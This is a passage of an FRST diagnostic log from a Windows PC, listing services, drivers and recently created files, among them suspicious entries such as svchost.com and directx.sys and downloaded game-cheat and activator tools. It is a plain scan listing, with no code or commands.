R2 AUEPLauncher; C:\Program Files\AMD\CIM\..\Performance Profile Client\AUEPLauncher.exe [60600 2020-03-17] (Advanced Micro Devices, Inc. -> AMD)
R2 DragonCenter_Service; C:\Program Files (x86)\MSI\Dragon Center\DragonCenter_Service.exe [142512 2019-04-29] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [811120 2020-04-22] (EasyAntiCheat Oy -> Epic Games, Inc)
R2 LightKeeperService; C:\Program Files (x86)\MSI\Dragon Center\Mystic_Light\LightKeeperService.exe [81552 2019-08-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6933272 2020-03-11] (Malwarebytes Inc -> Malwarebytes)
R2 NahimicService; C:\Windows\system32\NahimicService.exe [1758968 2019-11-28] (A-Volute -> Nahimic)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5930136 2020-04-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2004.6-0\NisSrv.exe [3304992 2020-04-21] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2004.6-0\MsMpEng.exe [103376 2020-04-21] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000 
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 amdgpio2; C:\Windows\System32\drivers\amdgpio2.sys [45832 2019-10-01] (Advanced Micro Devices INC. -> Advanced Micro Devices, Inc)
R3 amdgpio3; C:\Windows\System32\drivers\amdgpio3.sys [24424 2016-08-13] (AMD PMP-PE CB Code Signer v20160415 -> Advanced Micro Devices, Inc)
S3 amdkmcsp; C:\Windows\system32\DRIVERS\amdkmcsp.sys [101232 2017-06-12] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. )
R3 amdkmdag; C:\Windows\System32\DriverStore\FileRepository\u0353065.inf_amd64_2af28622e162cc90\B353014\atikmdag.sys [65752488 2020-03-18] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\Windows\System32\DriverStore\FileRepository\u0353065.inf_amd64_2af28622e162cc90\B353014\atikmpag.sys [592296 2020-03-18] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [102832 2019-09-18] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 AMDPCIDev; C:\Windows\System32\drivers\AMDPCIDev.sys [31592 2018-04-26] (Advanced Micro Devices Inc. -> Advanced Micro Devices)
R0 amdpsp; C:\Windows\System32\DRIVERS\amdpsp.sys [243048 2017-06-12] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. )
R2 AMDRyzenMasterDriver; C:\Program Files\AMD\Performance Profile Client\RyzenMaster\AMDRyzenMasterDriver.sys [70304 2017-11-16] (Advanced Micro Devices, Inc. -> Advanced Micro Devices)
R2 AMDRyzenMasterDriverV14; C:\Program Files\AMD\RyzenMasterSDK\bin\AMDRyzenMasterDriver.sys [70432 2019-07-03] (Advanced Micro Devices INC. -> Advanced Micro Devices)
S3 AppleKmdfFilter; C:\Windows\System32\drivers\AppleKmdfFilter.sys [20640 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.)
S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [35560 2018-05-10] (WDKTestCert build,131474841775766162 -> Apple Inc.)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [108152 2019-11-17] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
R1 BadlionAnticheat; C:\Windows\system32\drivers\BadlionAnticheat.sys [2490392 2020-02-26] (Microsoft Windows Hardware Compatibility Publisher -> <Turtle Entertainment>)
S3 BEDaisy; C:\Program Files (x86)\Common Files\BattlEye\BEDaisy.sys [3000688 2020-04-22] (BattlEye Innovations e.K. -> )
S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [231936 2019-09-10] (Microsoft Corporation) [File not signed]
R1 EneIo; C:\Windows\system32\drivers\ene.sys [17624 2019-05-22] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 ipadtst; C:\ProgramData\MSI\Super_Charger\ipadtst_64.sys [20464 2013-11-11] (MICRO-STAR INTERNATIONAL CO., LTD. -> Windows ® Win 7 DDK provider)
S3 ipadtst2; C:\ProgramData\MSI\Super_Charger\ipadtst2_64.sys [16336 2016-07-29] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [214496 2020-04-23] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [20936 2020-03-11] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [248968 2020-04-23] (Malwarebytes Inc -> Malwarebytes)
R3 Nahimic_Mirroring; C:\Windows\System32\drivers\Nahimic_Mirroring.sys [85592 2020-01-17] (A-Volute -> Windows ® Win 7 DDK provider)
S3 netr28ux; C:\Windows\System32\drivers\netr28ux.sys [2224128 2019-03-19] (Microsoft Windows -> MediaTek Inc.)
R3 NTIOLib_CC_COMM; C:\Program Files (x86)\MSI\Dragon Center\Lib\SYS\NTIOLib_X64.sys [14288 2017-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NTIOLib_CC_CPU; C:\Program Files (x86)\MSI\Dragon Center\Lib\Super_Charger\NTIOLib_X64.sys [14288 2017-07-10] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 NTIOLib_MysticLight; C:\Program Files (x86)\MSI\Dragon Center\Mystic_Light\Lib\NTIOLib_X64.sys [14288 2019-08-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [662528 2019-03-19] (Microsoft Windows -> Realtek )
S3 tap0901cn; C:\Windows\System32\drivers\tap0901cn.sys [45576 2018-03-20] (Connectify (Connectify, Inc.) -> The OpenVPN Project)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [45960 2020-04-21] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [394680 2020-04-21] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [64944 2020-04-21] (Microsoft Windows -> Microsoft Corporation)
S1 jisbslij; \??\C:\Windows\system32\drivers\jisbslij.sys [X]
S1 kellzdxf; \??\C:\Windows\system32\drivers\kellzdxf.sys [X]
S4 nvvhci; \SystemRoot\System32\drivers\nvvhci.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-04-23 10:14 - 2020-04-23 10:15 - 000032594 _____ C:\Users\ntbea\Downloads\FRST.txt
2020-04-23 10:13 - 2020-04-23 10:14 - 000000000 ____D C:\FRST
2020-04-23 10:13 - 2020-04-23 10:13 - 002282496 _____ (Farbar) C:\Users\ntbea\Downloads\FRST64.exe
2020-04-23 09:42 - 2020-04-23 10:11 - 000041472 _____ C:\Windows\svchost.com
2020-04-23 09:25 - 2020-04-23 09:25 - 000248968 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2020-04-23 09:25 - 2020-04-23 09:25 - 000214496 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2020-04-22 22:47 - 2020-04-22 22:47 - 002342912 _____ C:\Users\ntbea\Downloads\MinecraftInstaller (1).msi
2020-04-22 22:33 - 2020-04-22 22:33 - 000000000 ____D C:\Program Files (x86)\EasyAntiCheat
2020-04-22 22:29 - 2020-04-22 22:29 - 000000314 _____ C:\Users\ntbea\Desktop\Fortnite.url
2020-04-22 21:57 - 2020-04-22 21:57 - 000001429 _____ C:\Users\ntbea\Desktop\Roblox Player.lnk
2020-04-22 21:42 - 2020-04-22 21:43 - 000000000 ____D C:\Users\ntbea\.dotnet
2020-04-22 21:42 - 2020-04-22 21:42 - 000001795 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2019.lnk
2020-04-22 21:42 - 2020-04-22 21:42 - 000000000 ____D C:\Program Files (x86)\dotnet
2020-04-22 21:38 - 2020-04-22 21:38 - 000001355 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio Installer.lnk
2020-04-22 21:34 - 2020-04-22 21:57 - 000001244 _____ C:\Users\ntbea\Desktop\Roblox Studio.lnk
2020-04-22 21:33 - 2020-04-22 21:33 - 001555544 _____ (Roblox Corporation) C:\Users\ntbea\Downloads\RobloxPlayerLauncher.exe
2020-04-22 21:31 - 2020-04-22 21:31 - 001394488 _____ (Microsoft Corporation) C:\Users\ntbea\Downloads\vs_community__469491166.1567223716.exe
2020-04-22 21:15 - 2020-04-22 21:15 - 000000000 ____D C:\Program Files\Epic Games
2020-04-22 21:11 - 2020-04-22 21:12 - 000000000 ____D C:\ProgramData\Epic
2020-04-22 21:11 - 2020-04-22 21:11 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2020-04-22 21:11 - 2020-04-22 21:11 - 000001258 _____ C:\Users\Public\Desktop\Epic Games Launcher.lnk
2020-04-22 21:11 - 2020-04-22 21:11 - 000001258 _____ C:\ProgramData\Desktop\Epic Games Launcher.lnk
2020-04-22 21:11 - 2020-04-22 21:11 - 000000000 ____D C:\Program Files (x86)\Epic Games
2020-04-22 21:10 - 2020-04-22 21:11 - 000000000 ____D C:\Users\ntbea\AppData\Local\EpicGamesLauncher
2020-04-22 14:40 - 2020-04-22 14:41 - 000579434 _____ C:\Users\ntbea\Desktop\Synapse-X.zip
2020-04-22 14:14 - 2020-04-22 14:14 - 044081152 _____ C:\Users\ntbea\Downloads\EpicInstaller-10.15.2-unrealtournament.msi
2020-04-22 10:43 - 2020-04-22 15:17 - 000002550 _____ C:\Users\ntbea\Desktop\Rkill.txt
2020-04-22 10:43 - 2020-04-22 10:43 - 001802704 _____ (Bleeping Computer, LLC) C:\Users\ntbea\Downloads\rkill.exe
2020-04-22 09:58 - 2020-04-23 10:11 - 000000095 _____ C:\Windows\directx.sys
2020-04-21 17:25 - 2020-04-22 11:01 - 000000000 ____D C:\Users\ntbea\Desktop\Buffalo Haxx
2020-04-21 17:14 - 2020-04-21 17:14 - 000002480 _____ C:\Users\ntbea\Desktop\aimbot.txt
2020-04-21 16:48 - 2020-04-21 16:48 - 000013824 _____ () C:\Users\ntbea\Downloads\WeAreDevs_API.dll
2020-04-21 11:08 - 2020-04-21 11:08 - 000011894 _____ C:\Users\ntbea\Downloads\Night Vision Pack 1.0.3.mcpack
2020-04-21 11:07 - 2020-04-21 11:07 - 000032524 _____ C:\Users\ntbea\Downloads\x-ray-direct-download (1).mcpack
2020-04-21 11:03 - 2020-04-21 11:03 - 007290144 _____ C:\Users\ntbea\Downloads\Xray pack V2.0.mcpack
2020-04-21 11:01 - 2020-04-21 11:01 - 000032524 _____ C:\Users\ntbea\Downloads\x-ray-direct-download.mcpack
2020-04-20 14:41 - 2020-04-22 22:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Minecraft Launcher
2020-04-20 14:41 - 2020-04-20 14:41 - 002342912 _____ C:\Users\ntbea\Downloads\MinecraftInstaller.msi
2020-04-20 14:01 - 2020-04-20 14:41 - 000000000 ____D C:\Users\ntbea\Downloads\DiscordNitroGeneratorV2
2020-04-20 11:22 - 2020-04-20 11:23 - 026481424 _____ (Python Software Foundation) C:\Users\ntbea\Downloads\python-3.8.2.exe
2020-04-20 11:08 - 2020-04-20 11:08 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\Microsoft Teams
2020-04-20 10:37 - 2020-04-20 10:37 - 000000000 ____D C:\Users\ntbea\AppData\Local\SkinSoft
2020-04-19 17:42 - 2020-04-19 17:42 - 000000000 ____D C:\Users\ntbea\Desktop\Windows10Activator
2020-04-19 17:37 - 2020-04-19 17:37 - 000001416 _____ C:\Users\ntbea\Downloads\Windows10Activator.rar
2020-04-18 19:18 - 2020-04-18 19:18 - 029998640 _____ (JetBrains) C:\Users\ntbea\Downloads\JetBrains.dotPeek.2020.1.web.exe
2020-04-18 18:16 - 2020-04-18 18:16 - 000034091 _____ C:\Users\ntbea\Downloads\JailedCat Script - Linkvertise.txt
2020-04-18 11:18 - 2020-04-19 11:18 - 000002476 _____ C:\Users\ntbea\Desktop\The3EyedGamer - (The3EyedGamer - Exploits) - Chrome.lnk
2020-04-17 17:11 - 2020-04-17 17:12 - 000000181 _____ C:\Users\ntbea\Desktop\change hwid.txt
2020-04-16 21:49 - 2020-04-16 21:49 - 002426464 _____ C:\Users\ntbea\Downloads\Chocapic13_V8_Ultra.zip
2020-04-16 21:39 - 2020-04-16 21:40 - 005434242 _____ C:\Users\ntbea\Downloads\preview_OptiFine_1.15.2_HD_U_G1_pre13.jar
2020-04-16 12:45 - 2020-04-16 12:45 - 000000000 ____D C:\Users\ntbea\Downloads\fortnitepy-bot-master
2020-04-16 12:45 - 2020-04-16 12:45 - 000000000 ____D C:\Users\ntbea\Desktop\fortnitepy-bot-master
2020-04-16 12:42 - 2020-04-16 12:43 - 031505640 _____ (Python Software Foundation) C:\Users\ntbea\Downloads\python-3.6.0-amd64.exe
2020-04-16 12:42 - 2020-04-16 12:42 - 000015962 _____ C:\Users\ntbea\Downloads\fortnitepy-bot-master.zip
2020-04-15 16:46 - 2020-04-15 16:46 - 025444352 _____ (Microsoft Corporation) C:\Windows\system32\Hydrogen.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 019850240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 019812864 _____ (Microsoft Corporation) C:\Windows\system32\HologramWorld.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 018027520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 007017472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 005910016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 004129624 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 003512320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 002951832 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 002800640 _____ (Microsoft Corporation) C:\Windows\system32\WinSAT.exe
2020-04-15 16:46 - 2020-04-15 16:46 - 002494744 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 002369576 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.AppAgent.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 002188600 _____ (Microsoft Corporation) C:\Windows\system32\AppVEntSubsystems64.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 002180408 _____ (Microsoft Corporation) C:\Windows\system32\workfolderssvc.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001870408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001659408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.AppAgent.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001610240 _____ (Microsoft Corporation) C:\Windows\system32\HologramCompositor.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001545216 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2020-04-15 16:46 - 2020-04-15 16:46 - 001495864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppVEntSubsystems32.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001386296 _____ (Microsoft Corporation) C:\Windows\system32\AppVEntSubsystemController.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001310720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msjet40.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001264640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2020-04-15 16:46 - 2020-04-15 16:46 - 001151816 _____ (Microsoft Corporation) C:\Windows\system32\mfmpeg2srcsnk.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 001013000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmpeg2srcsnk.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000983040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmkvsrcsnk.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000835584 _____ (Microsoft Corporation) C:\Windows\system32\WorkfoldersControl.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000744960 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.Office2013CustomActions.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000701440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Mirage.Internal.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000689152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CPFilters.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000525312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsecedit.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000514560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.Office2013CustomActions.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000456192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appwiz.cpl
2020-04-15 16:46 - 2020-04-15 16:46 - 000444416 _____ (Microsoft Corporation) C:\Windows\system32\MSFlacDecoder.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000420152 _____ (Microsoft Corporation) C:\Windows\system32\MSAudDecMFT.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000380416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSFlacDecoder.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrd3x40.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msexcl40.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000321536 _____ (Microsoft Corporation) C:\Windows\system32\wbadmin.exe
2020-04-15 16:46 - 2020-04-15 16:46 - 000241152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msltus40.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000225792 _____ (Microsoft Corporation) C:\Windows\system32\WorkFoldersShell.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iasrad.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000179200 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.XamlHost.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000178176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srumsvc.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000175616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IndexedDbLegacy.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000135168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.XamlHost.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000117248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakradiag.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000105472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakrathunk.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000105472 _____ (Microsoft Corporation) C:\Windows\system32\WorkFolders.exe
2020-04-15 16:46 - 2020-04-15 16:46 - 000070144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000066048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iasacct.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srumapi.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.Office2010CustomActions.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000040448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iaspolcy.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.Office2010CustomActions.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2020-04-15 16:46 - 2020-04-15 16:46 - 000023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ias.dll
2020-04-15 16:45 - 2020-04-15 16:46 - 000090624 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 022636544 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 017790464 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 014818816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 009930552 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 008013824 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 007849216 _____ (Microsoft Corporation) C:\Windows\system32\OneCoreUAPCommonProxyStub.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 007756800 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 007604584 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 006523048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 006168064 _____ (Microsoft Corporation) C:\Windows\system32\twinui.pcshell.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 005040640 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 004611584 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 004563200 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 004538880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 003980800 _____ (Microsoft Corporation) C:\Windows\system32\tellib.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 003802624 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 003753472 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_nt.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 003742544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 003729408 _____ (Microsoft Corporation) C:\Windows\system32\win32kfull.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 003708928 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentServer.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 003587384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 003547648 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 003109376 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 002986808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 002871608 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 002800128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32kfull.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 002767928 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 002717184 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys
2020-04-15 16:45 - 2020-04-15 16:45 - 002453504 _____ (Microsoft Corporation) C:\Windows\system32\InstallService.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 002131456 _____ (Microsoft Corporation) C:\Windows\system32\WpcDesktopMonSvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 002126144 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 002114560 _____ (Microsoft Corporation) C:\Windows\system32\Windows.CloudStore.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 002086656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001999960 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001960448 _____ (Microsoft Corporation) C:\Windows\system32\aadtb.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001945600 _____ (Microsoft Corporation) C:\Windows\system32\dcomp.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001942528 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001918976 _____ (Microsoft Corporation) C:\Windows\system32\wevtsvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001835008 _____ (Microsoft Corporation) C:\Windows\system32\enterprisecsps.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001783296 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Input.Inking.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001764336 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001762816 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001757096 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2020-04-15 16:45 - 2020-04-15 16:45 - 001729024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InstallService.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001726264 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001719808 _____ (Microsoft Corporation) C:\Windows\system32\Wpc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001697792 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001665216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001664896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001656904 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001646048 _____ (Microsoft Corporation) C:\Windows\system32\gdi32full.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001612800 _____ (Microsoft Corporation) C:\Windows\system32\wpncore.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001603584 _____ (Microsoft Corporation) C:\Windows\system32\dosvc.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001587712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aadtb.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001512832 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 001497600 _____ (Microsoft Corporation) C:\Windows\system32\TokenBroker.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001484384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 001480192 _____ (Microsoft Corporation) C:\Windows\system32\usocoreworker.exe
